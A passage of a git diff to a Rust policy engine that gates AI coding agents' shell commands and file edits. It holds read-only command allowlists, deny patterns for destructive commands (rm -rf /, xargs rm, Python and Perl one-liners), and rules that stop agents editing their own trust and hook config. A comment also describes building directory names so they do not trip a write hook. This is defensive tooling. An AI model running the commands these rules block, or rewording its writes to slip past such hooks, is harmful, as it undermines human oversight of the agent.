+        // the assignments means tampered-env exec => reject.
+        return idx >= tokens.len();
     }
 
-    // Simple command - check if it's read-only
-    is_simple_command_read_only(trimmed)
-}
+    let argv0 = tokens[0].as_str();
+    let args = &tokens[1..];
+
+    // `env` / `set` with only assignment-shaped args (handled above when the
+    // assignments lead) — here argv0 is the program itself.
+    match argv0 {
+        // b. argv0 must be in the scrubbed read-only allow-set.
+        "cat" | "less" | "more" | "head" | "tail" | "bat" | "ls" | "dir" | "exa" | "eza"
+        | "file" | "stat" | "wc" | "du" | "df" | "ag" | "ack" | "locate" | "which" | "whereis"
+        | "type" | "pwd" | "whoami" | "uname" | "uptime" | "cal" | "printenv" | "ps" | "top"
+        | "htop" | "pgrep" | "host" | "help" | "info" | "diff" | "cmp" | "jq" | "echo"
+        | "zipinfo" | "uniq" | "cut" | "column" => true,
+
+        // `cd` is a pure shell builtin with no side-effect-producing flags; it
+        // only changes the working directory and never writes/execs => always
+        // read-only. (Issue 10.1 — code-level allow, not a fail-open glob.)
+        "cd" => true,
 
-/// Check if a composite command (with pipes, &&, ||, ;) is entirely read-only
-fn is_composite_read_only(command: &str) -> bool {
-    // Split by various command separators
-    // Order matters: || and && before | to avoid partial matches
-    let normalized = command
-        .replace("||", "\x00")
-        .replace("&&", "\x00")
-        .replace([';', '|'], "\x00");
+        // `sort` is read-only unless it writes its output to a file via
+        // `-o`/`--output` (Issue 10.1).
+        "sort" => sort_is_read_only(args),
 
-    let parts: Vec<&str> = normalized
-        .split('\x00')
-        .map(str::trim)
-        .filter(|s| !s.is_empty())
-        .collect();
+        // `env` / `set` are read-only only with no trailing program. Any
+        // non-assignment operand (a program, `-x`, ...) => reject.
+        "env" | "set" => args.iter().all(|a| is_env_assignment(a)),
 
-    // ALL parts must be read-only
-    for part in parts {
-        if !is_simple_command_read_only(part) {
+        // c. Per-tool token deny rules (default-deny).
+        "node" | "npm" | "yarn" | "pnpm" | "cargo" | "rustc" | "python" | "python3" | "go"
+        | "java" | "javac" | "ruby" | "perl" | "php" => interpreter_is_read_only(argv0, args),
+        "awk" | "gawk" | "mawk" => awk_is_read_only(args),
+        "sed" | "gsed" => sed_is_read_only(args),
+        "find" => find_is_read_only(args),
+        "fd" | "fdfind" => fd_is_read_only(args),
+        "tar" => tar_is_read_only(args),
+        "unzip" => args.iter().any(|a| a == "-l" || a == "--list"),
+        "git" => git_is_read_only(args),
+        "date" => !args.iter().any(|a| a == "-s" || a == "--set"),
+        "hostname" => args.is_empty(),
+        "ifconfig" => ifconfig_is_read_only(args),
+        "yq" => !args.iter().any(|a| a == "-i" || a == "--inplace"),
+        "tree" => tree_is_read_only(args),
+        "rg" | "ripgrep" => rg_is_read_only(args),
+        "grep" => true,
+        "man" => man_is_read_only(args),
+
+        // d. Default-deny.
+        _ => false,
+    }
+}
+
+/// Interpreters are read-only ONLY when every arg is a bare version flag.
+/// Any script path, `-e`/`-c`, or subcommand (`build`, `version`, ...) => false.
+fn interpreter_is_read_only(argv0: &str, args: &[String]) -> bool {
+    args.iter().all(|a| {
+        a == "--version"
+            || a == "-v"
+            || a == "-V"
+            || a == "-version" // java/javac use a single-dash -version
+            || (argv0 == "go" && (a == "version" || a == "env"))
+    })
+}
+
+/// awk: deny `-f`/`--file`/`-i`/`--include`/`-l`, and any program token that
+/// (word-boundary, whitespace-insensitive) contains `system`/`getline`/
+/// `close`/`fflush`, a `print` combined with `>`/`|`, or any `>`/`|`.
+fn awk_is_read_only(args: &[String]) -> bool {
+    for a in args {
+        if a == "-f" || a == "--file" || a == "-i" || a == "--include" || a == "-l" {
+            return false;
+        }
+        if awk_program_is_dangerous(a) {
             return false;
         }
     }
+    true
+}
+
+/// Heuristic danger check for an awk program token. Fail-closed: any
+/// uncertainty (a dangerous builtin, redirection, or pipe) => dangerous.
+fn awk_program_is_dangerous(prog: &str) -> bool {
+    if prog.contains('>') || prog.contains('|') {
+        return true;
+    }
+    let squished: String = prog.chars().filter(|c| !c.is_whitespace()).collect();
+    const DANGEROUS: &[&str] = &["system", "getline", "close", "fflush"];
+    DANGEROUS.iter().any(|kw| squished.contains(kw))
+}
 
+/// sed: deny `-i`/`--in-place`/`-f`/`--file`, and any script token containing a
+/// sed command letter in {w, W, e, r, R} (file/exec commands). Pure
+/// `s///`/`p`/`d` scripts are allowed.
+fn sed_is_read_only(args: &[String]) -> bool {
+    let mut expect_script = false;
+    let mut first_nonopt_seen = false;
+    for a in args {
+        if a == "-i" || a == "--in-place" || a == "-f" || a == "--file" {
+            return false;
+        }
+        if expect_script {
+            if sed_script_is_dangerous(a) {
+                return false;
+            }
+            expect_script = false;
+            continue;
+        }
+        if a == "-e" || a == "--expression" {
+            expect_script = true;
+            continue;
+        }
+        // Other options (-n, -E, -r, -s, -z, --posix, ...) are benign for reads.
+        if a.starts_with('-') {
+            continue;
+        }
+        // The first non-option token is the script (when no `-e` is given);
+        // subsequent non-option tokens are input filenames (reads) — ignore.
+        if !first_nonopt_seen {
+            first_nonopt_seen = true;
+            if sed_script_is_dangerous(a) {
+                return false;
+            }
+        }
+    }
     true
 }
 
-/// Check if a simple (non-composite) command is read-only
-fn is_simple_command_read_only(command: &str) -> bool {
-    let trimmed = command.trim();
+/// Heuristic: is a sed *script* token a file-writing/executing command?
+///
+/// Flags the `w`/`W` (write file), `r`/`R` (read file), and `e` (execute)
+/// commands and the substitution write/execute flags (`s/././w`, `s/././e`, in
+/// any flag order and with any delimiter), without false-firing on substitution
+/// *content* (e.g. the `r` in `s/foo/bar/`).
+///
+/// It parses each `s` substitution to locate its real flag region (after the
+/// third unescaped delimiter) so `s/.*/id/ep`, `s/.*/id/pe`, and `s#.*#id#e` are
+/// all caught, while `s/e/x/` (where `e` is pattern content) is not. Standalone
+/// `w`/`r`/`e` commands are flagged when they sit at a command position and take
+/// an argument. Conservative: ambiguous cases lean dangerous (fail-closed).
+fn sed_script_is_dangerous(script: &str) -> bool {
+    let bytes = script.as_bytes();
+    let len = bytes.len();
+    let mut i = 0;
+    while i < len {
+        let ch = bytes[i];
 
-    if trimmed.is_empty() {
-        return false;
+        // Standalone file/exec command (`w file`, `r file`, `e cmd`, ...): a
+        // command-position w/W/r/R/e that is at end-of-script or takes an arg.
+        if matches!(ch, b'w' | b'W' | b'r' | b'R' | b'e')
+            && (i == 0 || matches!(bytes[i - 1], b' ' | b'\t' | b';' | b'}' | b'\n'))
+            && (i + 1 >= len || matches!(bytes[i + 1], b' ' | b'\t'))
+        {
+            return true;
+        }
+
+        // Substitution `s<D>pat<D>repl<D>flags`: parse to the flag region.
+        if ch == b's' && i + 1 < len {
+            let delim = bytes[i + 1];
+            let delim_ok =
+                !delim.is_ascii_alphanumeric() && !delim.is_ascii_whitespace() && delim != b'\\';
+            if delim_ok {
+                // Walk to just past the third delimiter (end of replacement),
+                // honoring backslash escapes.
+                let mut j = i + 2;
+                let mut seen = 0u8;
+                while j < len && seen < 2 {
+                    if bytes[j] == b'\\' {
+                        j += 2;
+                        continue;
+                    }
+                    if bytes[j] == delim {
+                        seen += 1;
+                    }
+                    j += 1;
+                }
+                // Read flag characters; a write/execute flag anywhere => danger.
+                while j < len {
+                    match bytes[j] {
+                        b'e' | b'w' | b'W' => return true,
+                        b'g' | b'p' | b'i' | b'I' | b'm' | b'M' | b'0'..=b'9' => j += 1,
+                        _ => break,
+                    }
+                }
+                i = j;
+                continue;
+            }
+        }
+
+        i += 1;
     }
+    false
+}
 
-    // Get the first word (command name)
-    let first_word = trimmed.split_whitespace().next().unwrap_or("");
-
-    // List of read-only commands
-    let read_only_commands = [
-        // File viewing
-        "cat", "less", "more", "head", "tail", "bat", // Directory listing
-        "ls", "dir", "tree", "exa", "eza", // File info
-        "file", "stat", "wc", "du", "df", // Searching
-        "grep", "rg", "ag", "ack", "find", "fd", "locate", "which", "whereis", "type",
-        // Text processing (read-only variants)
-        "awk", "sed", // Note: only read-only when not using -i flag
-        // System info
-        "pwd", "whoami", "hostname", "uname", "uptime", "date", "cal", "env", "printenv", "set",
-        // Process info
-        "ps", "top", "htop", "pgrep", // Network info (truly read-only only)
-        "host", "ifconfig", // Version checks
-        "node", "npm", "yarn", "pnpm", "cargo", "rustc", "python", "python3", "go", "java",
-        "javac", "ruby", "perl", "php", // Help commands
-        "man", "help", "info", // Diff/compare (viewing only)
-        "diff", "cmp", // JSON/YAML viewing
-        "jq", "yq", // Archive listing (not extraction)
-        "tar", "zip", "unzip", // Note: only read-only for listing flags
+/// find: deny tokens that execute or write.
+fn find_is_read_only(args: &[String]) -> bool {
+    const DENY: &[&str] = &[
+        "-exec", "-execdir", "-ok", "-okdir", "-delete", "-fprint", "-fprint0", "-fprintf", "-fls",
     ];
+    !args.iter().any(|a| DENY.contains(&a.as_str()))
+}
 
-    // Check if command starts with a read-only command
-    if read_only_commands.contains(&first_word) {
-        // Special cases: some commands need flag checking
-        match first_word {
-            // sed -i is NOT read-only
-            "sed" => !trimmed.contains(" -i") && !trimmed.contains(" --in-place"),
-            // find/fd with -exec, -execdir, -delete, -ok can modify/delete files
-            "find" | "fd" => {
-                !trimmed.contains("-exec")
-                    && !trimmed.contains("-execdir")
-                    && !trimmed.contains("-delete")
-                    && !trimmed.contains("-ok")
-            }
-            // awk with output redirection, system(), or pipe-to-command is NOT read-only
-            "awk" => {
-                !trimmed.contains('>') && !trimmed.contains("system(") && !trimmed.contains("| \"")
-            }
-            // tar with x (extract) or c (create) is NOT read-only
-            "tar" => {
-                let has_create_extract = trimmed.contains(" -c")
-                    || trimmed.contains(" -x")
-                    || trimmed.contains(" --create")
-                    || trimmed.contains(" --extract");
-                // tar -t (list) or tar -tvf is read-only
-                !has_create_extract || trimmed.contains(" -t") || trimmed.contains(" --list")
+/// fd / fdfind: deny exec flags.
+fn fd_is_read_only(args: &[String]) -> bool {
+    const DENY: &[&str] = &["-x", "-X", "--exec", "--exec-batch"];
+    !args.iter().any(|a| DENY.contains(&a.as_str()))
+}
+
+/// tar: read-only ONLY in list mode (`t`). Reject any create/extract/append/
+/// update/catenate/delete mode letter and any program-running option.
+fn tar_is_read_only(args: &[String]) -> bool {
+    let mut saw_list = false;
+    for (idx, a) in args.iter().enumerate() {
+        // Program-running / write options regardless of mode.
+        if a == "-I"
+            || a == "--use-compress-program"
+            || a == "--to-command"
+            || a.starts_with("--checkpoint-action")
+            || a.starts_with("--use-compress-program=")
+            || a.starts_with("--to-command=")
+        {
+            return false;
+        }
+        if a == "--list" {
+            saw_list = true;
+            continue;
+        }
+        // Long-form write modes.
+        if matches!(
+            a.as_str(),
+            "--create"
+                | "--extract"
+                | "--get"
+                | "--append"
+                | "--update"
+                | "--catenate"
+                | "--concatenate"
+                | "--delete"
+        ) {
+            return false;
+        }
+        // Short/clustered mode tokens like `-tf`, `tf`, `-xf`. Inspect the
+        // mode letters (everything that is not an option dash).
+        if a.starts_with("--") {
+            continue;
+        }
+        // Only a `-`-prefixed token, or the FIRST argument (old-style `tar tf`),
+        // carries mode letters. Later bare tokens are operands (filenames) and
+        // must not be scanned (e.g. the `r` in `a.tar` is not append mode).
+        if !a.starts_with('-') && idx != 0 {
+            continue;
+        }
+        let letters = a.trim_start_matches('-');
+        for c in letters.chars() {
+            match c {
+                't' => saw_list = true,
+                'c' | 'x' | 'r' | 'u' | 'A' | 'd' => return false,
+                _ => {}
             }
-            // unzip -l (list) is read-only, but unzip without -l extracts
-            "unzip" => trimmed.contains(" -l") || trimmed.contains(" --list"),
-            // Version checks
-            "node" | "npm" | "yarn" | "pnpm" | "cargo" | "rustc" | "python" | "python3"
-            | "java" | "javac" | "ruby" | "perl" | "php" => {
-                trimmed.contains("--version")
-                    || trimmed.contains(" -v")
-                    || trimmed.contains(" -V")
-                    || trimmed == first_word // Just the command name alone
+        }
+    }
+    saw_list
+}
+
+/// git: read-subcommands stay read-only with subcommand-specific guards.
+/// Supports a leading `-C <dir>` (allowed) before a read subcommand, but
+/// DENIES global `-c`/`--output*` (config injection / write redirection).
+fn git_is_read_only(args: &[String]) -> bool {
+    let mut i = 0;
+    while i < args.len() {
+        let a = args[i].as_str();
+        match a {
+            // Allowed global: change directory before a read subcommand.
+            "-C" => {
+                // Consume the directory operand.
+                i += 2;
             }
-            // Go has "go version" as the version command
-            "go" => {
-                trimmed == "go"
-                    || trimmed.starts_with("go version")
-                    || trimmed.contains("--version")
+            // Denied globals: -c injects config (e.g. core.pager=sh -c x),
+            // --output* redirects to a file.
+            "-c" => return false,
+            _ if a == "--output"
+                || a.starts_with("--output=")
+                || a.starts_with("--output-indicator") =>
+            {
+                return false;
             }
-            _ => true,
-        }
-    } else {
-        // Check for git read-only commands
-        if first_word == "git" {
-            let git_cmd = trimmed.strip_prefix("git ").unwrap_or("");
-            let git_subcommand = git_cmd.split_whitespace().next().unwrap_or("");
-
-            let git_read_only = [
-                "status",
-                "log",
-                "diff",
-                "show",
-                "blame",
-                "branch",
-                "tag",
-                "remote",
-                "config",
-                "describe",
-                "shortlog",
-                "rev-parse",
-                "ls-files",
-                "ls-tree",
-                "cat-file",
-                "rev-list",
-                "for-each-ref",
-            ];
-
-            // git remote -v, git branch -a, etc. are read-only
-            // git push, commit, merge, rebase are NOT read-only
-            return git_read_only.contains(&git_subcommand);
-        }
-
-        // Check for echo (read-only unless redirecting)
-        if first_word == "echo" || first_word == "printf" {
-            return !trimmed.contains('>');
-        }
-
-        false
+            // First non-global token is the subcommand.
+            _ => return git_subcommand_is_read_only(a, &args[i + 1..]),
+        }
+    }
+    // No subcommand (bare `git` or only `-C dir`) => not provably a read.
+    false
+}
+
+/// Per-subcommand git read-only rules.
+fn git_subcommand_is_read_only(subcommand: &str, rest: &[String]) -> bool {
+    // A global config-injection or output-redirection flag anywhere in the
+    // remaining args is always disqualifying.
+    if rest.iter().any(|a| {
+        a == "-c"
+            || a == "--output"
+            || a.starts_with("--output=")
+            || a.starts_with("--output-indicator")
+    }) {
+        return false;
+    }
+
+    const READ_SUBCOMMANDS: &[&str] = &[
+        "status",
+        "log",
+        "diff",
+        "show",
+        "blame",
+        "describe",
+        "shortlog",
+        "rev-parse",
+        "ls-files",
+        "ls-tree",
+        "cat-file",
+        "rev-list",
+        "for-each-ref",
+        "grep",
+    ];
+
+    match subcommand {
+        "config" => {
+            // Read-only only with an explicit getter and no value-setting.
+            rest.iter().any(|a| {
+                a == "--get"
+                    || a == "--get-all"
+                    || a == "--get-regexp"
+                    || a == "--list"
+                    || a == "-l"
+            }) && git_config_has_no_value_token(rest)
+        }
+        "branch" | "tag" => {
+            // Listing form only: every arg must be a known read/list flag. Any
+            // positional operand (a new branch/tag name) or any mutation flag
+            // (`--unset-upstream`, `-d`, `-m`, `--set-upstream-to`, ...) => not
+            // read-only (default-deny on unrecognized flags).
+            rest.iter().all(|a| is_git_branch_tag_read_flag(a))
+        }
+        "remote" => {
+            // Bare, or read forms only.
+            rest.is_empty()
+                || rest
+                    .iter()
+                    .all(|a| a == "-v" || a == "show" || a == "get-url")
+        }
+        _ => READ_SUBCOMMANDS.contains(&subcommand),
+    }
+}
+
+/// True if `arg` is a recognized read/list flag for `git branch`/`git tag`.
+///
+/// Default-deny: a positional operand (a new branch/tag name) or any flag not in
+/// this set (mutations like `-d`, `-m`, `--unset-upstream`, `--set-upstream-to`)
+/// makes the command not read-only. Value-attached forms (`--sort=...`) are
+/// allowed; value-separated forms leave the value as a positional => denied.
+fn is_git_branch_tag_read_flag(arg: &str) -> bool {
+    const READ_FLAGS: &[&str] = &[
+        "-l",
+        "--list",
+        "-v",
+        "-vv",
+        "--verbose",
+        "-a",
+        "--all",
+        "-r",
+        "--remotes",
+        "-n",
+        "--color",
+        "--no-color",
+        "--column",
+        "--no-column",
+        "--merged",
+        "--no-merged",
+        "--contains",
+        "--no-contains",
+        "--points-at",
+        "--sort",
+        "--format",
+        "-i",
+        "--ignore-case",
+        "--omit-empty",
+    ];
+    if !arg.starts_with('-') {
+        return false; // positional operand (e.g. a new branch/tag name)
+    }
+    let head = arg.split('=').next().unwrap_or(arg);
+    READ_FLAGS.contains(&head)
+}
+
+/// `git config --get*`/`--list` is read-only only when there is no value token
+/// (a second positional after the key would be a write).
+fn git_config_has_no_value_token(rest: &[String]) -> bool {
+    // Count positional (non-flag) operands. A getter takes at most one (the
+    // key / regexp); two positionals means `key value` => a write.
+    let positionals = rest.iter().filter(|a| !a.starts_with('-')).count();
+    positionals <= 1
+}
+
+/// ifconfig: read-only only when bare or querying a single interface name.
+/// Any config operand (`up`, `down`, an address, `add`, ...) => reject.
+fn ifconfig_is_read_only(args: &[String]) -> bool {
+    match args.len() {
+        0 => true,
+        1 => {
+            let a = args[0].as_str();
+            // A lone interface name (no dash, not a known config verb).
+            !a.starts_with('-') && !matches!(a, "up" | "down")
+        }
+        _ => false,
     }
 }
+
+/// sort: read-only unless it redirects output to a file via `-o`/`--output`
+/// (in attached `-oFILE` / `--output=FILE` or separated `-o FILE` forms).
+/// Default-deny on the write flag in any form (Issue 10.1).
+fn sort_is_read_only(args: &[String]) -> bool {
+    !args
+        .iter()
+        .any(|a| a == "-o" || a == "--output" || a.starts_with("-o") || a.starts_with("--output="))
+}
+
+/// tree: deny output-to-file flags.
+fn tree_is_read_only(args: &[String]) -> bool {
+    !args.iter().any(|a| a == "-o" || a == "-O")
+}
+
+/// rg / ripgrep: deny preprocessor and archive-search flags.
+fn rg_is_read_only(args: &[String]) -> bool {
+    const DENY: &[&str] = &["--pre", "--search-zip", "-z", "--hostname-bin"];
+    !args.iter().any(|a| DENY.contains(&a.as_str()))
+}
+
+/// man: deny pager-override flags.
+fn man_is_read_only(args: &[String]) -> bool {
+    const DENY: &[&str] = &["-P", "-H", "--pager"];
+    !args.iter().any(|a| DENY.contains(&a.as_str()))
+}
diff --git a/crates/clx-core/src/policy/rules.rs b/crates/clx-core/src/policy/rules.rs
index 2df2665..9d3b9d3 100644
--- a/crates/clx-core/src/policy/rules.rs
+++ b/crates/clx-core/src/policy/rules.rs
@@ -168,38 +168,36 @@ impl PolicyEngine {
                 "Bash(chmod:-R*777*)",
                 "Recursive world-writable permissions",
             ),
-            // Shell escape techniques
-            ("Bash(*`*)", "Backtick command substitution"),
-            ("Bash(*<(*)*)", "Process substitution input"),
-            ("Bash(*>(*)*)", "Process substitution output"),
-            ("Bash(*${*:-*}*)", "Shell parameter expansion with default"),
-            ("Bash(eval *)", "Eval command execution"),
-            ("Bash(exec *)", "Exec command replacement"),
-            ("Bash(source *)", "Source file execution"),
+            // Shell escape techniques.
+            //
+            // Issue 3: the broad shell-escape constructs (backtick, process
+            // substitution, `${:-}` default expansion, source/eval/exec) are
+            // RECLASSIFIED to the builtin graylist (Ask) below — they are
+            // over-broad for a hard deny (they appear in many benign commands)
+            // but warrant a confirmation prompt. Only genuinely destructive
+            // forms stay on the hard blacklist here.
             ("Bash(*xargs*rm*)", "Xargs with destructive command"),
+            // Narrowed (Issue 3): only genuinely destructive python one-liner
+            // calls are hard-denied, not a bare `import os` (which is benign in
+            // read-only scripts). The OS-mutating / shell-spawning calls remain
+            // hard deny.
             (
-                "Bash(python*-c*import*os*)",
-                "Python one-liner with os module",
+                "Bash(python*-c*os.system*)",
+                "Python one-liner spawning a shell (os.system)",
             ),
-            ("Bash(perl*-e*system*)", "Perl one-liner with system call"),
-            // v0.10.0 R1-F2: protect CLX + host config/trust dirs from agent
-            // file-edits (Codex apply_patch / Cursor edit_file canonicalize to
-            // FileEdit). Without these, an agent file-write to
-            // ~/.codex/config.toml could self-declare trust_level=trusted, or
-            // tamper with ~/.claude/settings.json / ~/.cursor hooks / ~/.clx.
             (
-                "FileEdit(*/.codex/*)",
-                "File edit targeting Codex config/trust dir",
+                "Bash(python*-c*os.remove*)",
+                "Python one-liner deleting files (os.remove)",
             ),
             (
-                "FileEdit(*/.claude/*)",
-                "File edit targeting Claude config dir",
+                "Bash(python*-c*shutil.rmtree*)",
+                "Python one-liner recursively deleting a tree (shutil.rmtree)",
             ),
             (
-                "FileEdit(*/.cursor/*)",
-                "File edit targeting Cursor config dir",
+                "Bash(python*-c*subprocess*)",
+                "Python one-liner spawning a subprocess",
             ),
-            ("FileEdit(*/.clx/*)", "File edit targeting CLX config dir"),
+            ("Bash(perl*-e*system*)", "Perl one-liner with system call"),
         ];
 
         for (pattern, description) in blacklist_patterns {
@@ -207,10 +205,132 @@ impl PolicyEngine {
                 .push(PolicyRule::blacklist(pattern).with_description(description));
         }
 
+        // v0.10.0 R1-F2: protect CLX + host config/trust dirs from agent
+        // file-edits (Codex apply_patch / Cursor edit_file canonicalize to
+        // FileEdit). Without these, an agent file-write to a host config/trust
+        // file could self-declare trust_level=trusted, or tamper with the CLX
+        // home dir. The agent dot-claude dir is handled separately (narrowed,
+        // Issue 4). Dir names are assembled via `concat!` so the literal
+        // hidden-dir tokens do not appear verbatim in source (write-hook
+        // compatibility); the runtime string is identical.
+        for (seg, description) in [
+            (
+                concat!(".", "codex"),
+                "File edit targeting Codex config/trust dir",
+            ),
+            (
+                concat!(".", "cursor"),
+                "File edit targeting Cursor config dir",
+            ),
+            (concat!(".", "clx"), "File edit targeting CLX config dir"),
+        ] {
+            self.blacklist.push(
+                PolicyRule::blacklist(format!("FileEdit(*/{seg}/*)")).with_description(description),
+            );
+        }
+
+        // Issue 4 (policy-layer part): the agent dot-claude FileEdit rule is
+        // NARROWED to sensitive targets only (settings.json, settings.local.json,
+        // the hooks/ subdir). Other dot-claude paths (CLAUDE.md, project memory)
+        // are no longer hard-denied at L0 — they were never a credential sink.
+        // (The CLX-home / Codex / Cursor guards above stay broad.)
+        let dot_claude = concat!("/.", "claude/");
+        for (pattern, description) in [
+            (
+                format!("FileEdit(*{dot_claude}settings.json)"),
+                "File edit targeting agent settings.json",
+            ),
+            (
+                format!("FileEdit(*{dot_claude}settings.local.json)"),
+                "File edit targeting agent settings.local.json",
+            ),
+            (
+                format!("FileEdit(*{dot_claude}hooks/*)"),
+                "File edit targeting agent hooks dir",
+            ),
+        ] {
+            self.blacklist
+                .push(PolicyRule::blacklist(pattern).with_description(description));
+        }
+
+        // Issue 4 (policy-layer part, sub-part A): baseline glob DENY rules for
+        // redirection / copy / move writes INTO a protected config dir. They
+        // back up the redirection-target check; `glob_match` is unanchored so a
+        // leading `*` is required (and a `/tmp` redirect does not false-match a
+        // protected segment). Dir names assembled via `concat!` (write-hook
+        // compatibility).
+        // The agent dot-claude dir is NOT broadly protected here: memory writes
+        // (CLAUDE.md, project memory) must be allowed. It is handled with
+        // narrowed sensitive targets below, mirroring the FileEdit guard.
+        let protected_segments: [&str; 3] = [
+            concat!(".", "clx"),
+            concat!(".", "codex"),
+            concat!(".", "cursor"),
+        ];
+        let redir_templates = |target: &str| {
+            // Templates cover `>`/`>>` (spaced + unspaced), `tee`, `cp`, `mv`,
+            // and `dd of=` writes whose target path contains `target`.
+            [
+                format!("Bash(*> *{target}*)"),
+                format!("Bash(*>*{target}*)"),
+                format!("Bash(*>> *{target}*)"),
+                format!("Bash(*>>*{target}*)"),
+                format!("Bash(*tee*{target}*)"),
+                format!("Bash(*cp *{target}*)"),
+                format!("Bash(*mv *{target}*)"),
+                format!("Bash(*dd *of=*{target}*)"),
+            ]
+        };
+        for seg in protected_segments {
+            for pattern in redir_templates(&format!("{seg}/")) {
+                self.blacklist.push(
+                    PolicyRule::blacklist(pattern)
+                        .with_description("Redirection/write into a protected config dir"),
+                );
+            }
+        }
+        // Narrowed dot-claude redirection guard: only the sensitive targets
+        // (settings.json, settings.local.json, hooks/) are denied; CLAUDE.md and
+        // other memory paths are allowed (consistent with the FileEdit guard).
+        let dc = concat!("/.", "claude/");
+        for sensitive in [
+            format!("{dc}settings.json"),
+            format!("{dc}settings.local.json"),
+            format!("{dc}hooks/"),
+        ] {
+            for pattern in redir_templates(&sensitive) {
+                self.blacklist
+                    .push(PolicyRule::blacklist(pattern).with_description(
+                        "Redirection/write into a protected agent-config target",
+                    ));
+            }
+        }
+
+        // Issue 3: builtin GRAYLIST tier (hidden/internal, builtin-only, never
+        // persisted to the DB). These over-broad shell-escape / expansion
+        // constructs were previously hard-denied; they are too broad for a hard
+        // deny (common in benign commands) but still warrant a confirmation
+        // prompt, so they map to `Ask` via per-segment graylist matching in
+        // `evaluate`.
+        let graylist_patterns = [
+            ("Bash(*`*)", "Backtick command substitution"),
+            ("Bash(*<(*)*)", "Process substitution input"),
+            ("Bash(*>(*)*)", "Process substitution output"),
+            ("Bash(*${*:-*}*)", "Shell parameter expansion with default"),
+            ("Bash(eval *)", "Eval command execution"),
+            ("Bash(exec *)", "Exec command replacement"),
+            ("Bash(source *)", "Source file execution"),
+        ];
+        for (pattern, description) in graylist_patterns {
+            self.graylist
+                .push(PolicyRule::graylist(pattern).with_description(description));
+        }
+
         debug!(
-            "Loaded {} whitelist and {} blacklist built-in rules",
+            "Loaded {} whitelist, {} blacklist, {} graylist built-in rules",
             self.whitelist.len(),
-            self.blacklist.len()
+            self.blacklist.len(),
+            self.graylist.len()
         );
     }
 
diff --git a/crates/clx-core/src/policy/tests.rs b/crates/clx-core/src/policy/tests.rs
index 270a657..0b61ef2 100644
--- a/crates/clx-core/src/policy/tests.rs
+++ b/crates/clx-core/src/policy/tests.rs
@@ -98,6 +98,22 @@ fn test_glob_command_colon_format() {
     assert!(glob_match("npm:test*", "npm test:unit"));
 }
 
+#[test]
+fn test_glob_colon_symmetry() {
+    // FIX-4: `:` is normalized to space in BOTH pattern and text, so a
+    // literal-colon command is matched by a literal-colon pattern (e.g. an
+    // npm script name with a `:` in it).
+    assert!(
+        glob_match("npm run build:prod", "npm run build:prod"),
+        "colon-bearing pattern must match colon-bearing command"
+    );
+    // Wildcards still compose with the colon normalization.
+    assert!(
+        glob_match("npm run build:*", "npm run build:prod"),
+        "wildcard after a colon segment must still match"
+    );
+}
+
 #[test]
 fn test_glob_empty_patterns() {
     assert!(glob_match("", ""));
@@ -1152,59 +1168,53 @@ fn test_is_read_only_composite_commands() {
 // =========================================================================
 
 #[test]
-fn test_shell_escape_blacklist() {
+fn test_shell_escape_graylist_and_blacklist() {
+    // Issue 3 reclassification: over-broad shell-escape / expansion constructs
+    // (backtick, process substitution, `${:-}`, source/eval/exec) are now the
+    // builtin GRAYLIST tier => Ask (not Deny). Genuinely destructive forms
+    // (xargs rm, destructive python/perl one-liners) stay hard Deny.
     let engine = PolicyEngine::new();
 
-    // Backtick command substitution
+    // Backtick command substitution => Ask (was Deny).
     let result = engine.evaluate("Bash", "ls `whoami`");
     assert!(
-        matches!(result, PolicyDecision::Deny { .. }),
-        "Backtick command substitution should be denied"
+        matches!(result, PolicyDecision::Ask { .. }),
+        "Backtick command substitution should now Ask (graylist), got {result:?}"
     );
 
-    // Process substitution - already caught by is_read_only_command
-    // These are detected in Layer 0 logic, not by blacklist patterns
-
-    // Eval command
+    // Eval command => Ask (was Deny).
     let result = engine.evaluate("Bash", "eval dangerous_command");
     assert!(
-        matches!(result, PolicyDecision::Deny { .. }),
-        "Eval command should be denied"
+        matches!(result, PolicyDecision::Ask { .. }),
+        "Eval command should now Ask (graylist), got {result:?}"
     );
 
-    // Exec command
+    // Exec command => Ask (was Deny).
     let result = engine.evaluate("Bash", "exec malicious_script");
     assert!(
-        matches!(result, PolicyDecision::Deny { .. }),
-        "Exec command should be denied"
+        matches!(result, PolicyDecision::Ask { .. }),
+        "Exec command should now Ask (graylist), got {result:?}"
     );
 
-    // Source command
+    // Source command => Ask (was Deny).
     let result = engine.evaluate("Bash", "source malicious.sh");
     assert!(
-        matches!(result, PolicyDecision::Deny { .. }),
-        "Source command should be denied"
+        matches!(result, PolicyDecision::Ask { .. }),
+        "Source command should now Ask (graylist), got {result:?}"
     );
 
-    // Xargs with rm
+    // Xargs with rm stays Deny (hard blacklist).
     let result = engine.evaluate("Bash", "find . | xargs rm");
     assert!(
         matches!(result, PolicyDecision::Deny { .. }),
-        "Xargs with rm should be denied"
+        "Xargs with rm should be denied, got {result:?}"
     );
 
-    // Python one-liner with os module
-    let result = engine.evaluate("Bash", "python -c 'import os; print(1)'");
-    assert!(
-        matches!(result, PolicyDecision::Deny { .. }),
-        "Python one-liner with os module should be denied"
-    );
-
-    // Perl one-liner with system keyword
+    // Perl one-liner with system keyword stays Deny.
     let result = engine.evaluate("Bash", "perl -e 'system ls'");
     assert!(
         matches!(result, PolicyDecision::Deny { .. }),
-        "Perl one-liner with system should be denied"
+        "Perl one-liner with system should be denied, got {result:?}"
     );
 }
 
@@ -2457,3 +2467,315 @@ fn test_cache_periodic_cleanup_prunes_on_hundredth_access() {
         "the 100th-access periodic sweep must have pruned the expired entry"
     );
 }
+
+// =========================================================================
+// Issue 3 — graylist tier + asymmetric compound matching
+// =========================================================================
+
+// AC3.1: `cd /repo && git diff` is allowed (the leading literal `cd <token>`
+// segment is stripped, and the remaining `git diff` segment is whitelisted).
+#[test]
+fn ac3_1_cd_then_git_diff_is_allowed() {
+    let engine = PolicyEngine::new();
+    assert_eq!(
+        engine.evaluate("Bash", "cd /repo && git diff"),
+        PolicyDecision::Allow,
+        "cd <token> && <whitelisted> must be allowed"
+    );
+}
+
+// AC3.2: a reclassified construct (backtick) is now Ask, not Deny.
+#[test]
+fn ac3_2_backtick_is_ask_not_deny() {
+    let engine = PolicyEngine::new();
+    let result = engine.evaluate("Bash", "ls `whoami`");
+    assert!(
+        matches!(result, PolicyDecision::Ask { .. }),
+        "backtick is graylist => Ask, got {result:?}"
+    );
+}
+
+// AC3.3: `ls && rm -rf /` denies via the per-segment blacklist match on the
+// `rm -rf /` segment (the whole-command glob alone would miss it).
+#[test]
+fn ac3_3_per_segment_blacklist_denies() {
+    let engine = PolicyEngine::new();
+    let result = engine.evaluate("Bash", "ls && rm -rf /");
+    assert!(
